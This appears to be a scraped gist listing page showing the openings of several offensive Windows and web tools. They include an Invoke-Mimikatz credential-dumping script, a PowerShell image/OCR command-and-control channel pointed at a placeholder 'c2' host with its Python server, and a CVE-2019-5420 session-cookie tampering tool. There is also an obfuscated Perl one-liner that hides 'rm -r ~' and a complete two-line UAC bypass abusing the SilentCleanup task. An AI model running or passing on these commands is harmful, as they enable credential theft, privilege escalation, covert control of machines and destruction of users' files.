This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$shell = New-Object -com "Wscript.Shell" | |
while (1) { | |
Start-Sleep -Seconds 600 | |
$shell.sendkeys(".") | |
} |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-Mimikatz | |
{ | |
<# | |
.SYNOPSIS | |
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as | |
dump credentials without ever writing the mimikatz binary to disk. | |
The script has a ComputerName parameter which allows it to be executed against multiple computers. | |
This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <iostream> | |
#include <locale> | |
#include <codecvt> | |
#include <string> | |
#include <Windows.h> | |
#include <WinBase.h> | |
#include <io.h> | |
#include <fcntl.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Modified code from https://github.com/HumanEquivalentUnit/PowerShell-Misc | |
using namespace System.Drawing | |
using namespace System.Windows.Forms | |
using namespace Windows.Storage | |
using namespace Windows.Graphics.Imaging | |
Add-Type -AssemblyName System.Drawing | |
Add-Type -AssemblyName System.Windows.Forms |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Import-Module .\CQExtractor.psm1 -Force | |
$score = 0 | |
$arr = New-Object system.collections.hashtable | |
$arr["l"] = ".A" | |
$arr["1"] = ".B" | |
$arr["L"] = ".C" | |
$arr["i"] = ".D" | |
$arr["I"] = ".E" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Import-Module .\CQExtractor.psm1 -Force | |
# FIXME: replace with real C2 hostname | |
$C2 = "http://c2:8080/image.png" | |
$filename = "image.png" | |
$filename2 = "image2.png" | |
class Encoder { | |
[system.collections.hashtable]$arr |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import base64 | |
import http.server | |
from threading import Thread, Condition | |
from PIL import Image, ImageDraw, ImageFont | |
import pytesseract | |
condition = Condition() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# | |
# This is a simple decrypt-temper-encrypt tool for CVE-2019-5420 affecting ruby | |
# If you're lucky, session cookie will contain user id or other data to play with | |
# Look for cookies with two "--" substrings inside | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl -l | |
$??/$`rm -r ~/:s%%FD_XBLN|CEBLWXYB^SDLfSDZL^WU]SDONO%; | |
s%.%$&^'6'%ge;y*x-z*', *;s**$_*ee; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
New-ItemProperty "HKCU:\Environment" -Name "windir" -Value "cmd.exe /k cmd.exe" -PropertyType String -Force | |
schtasks.exe /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I |
OlderNewer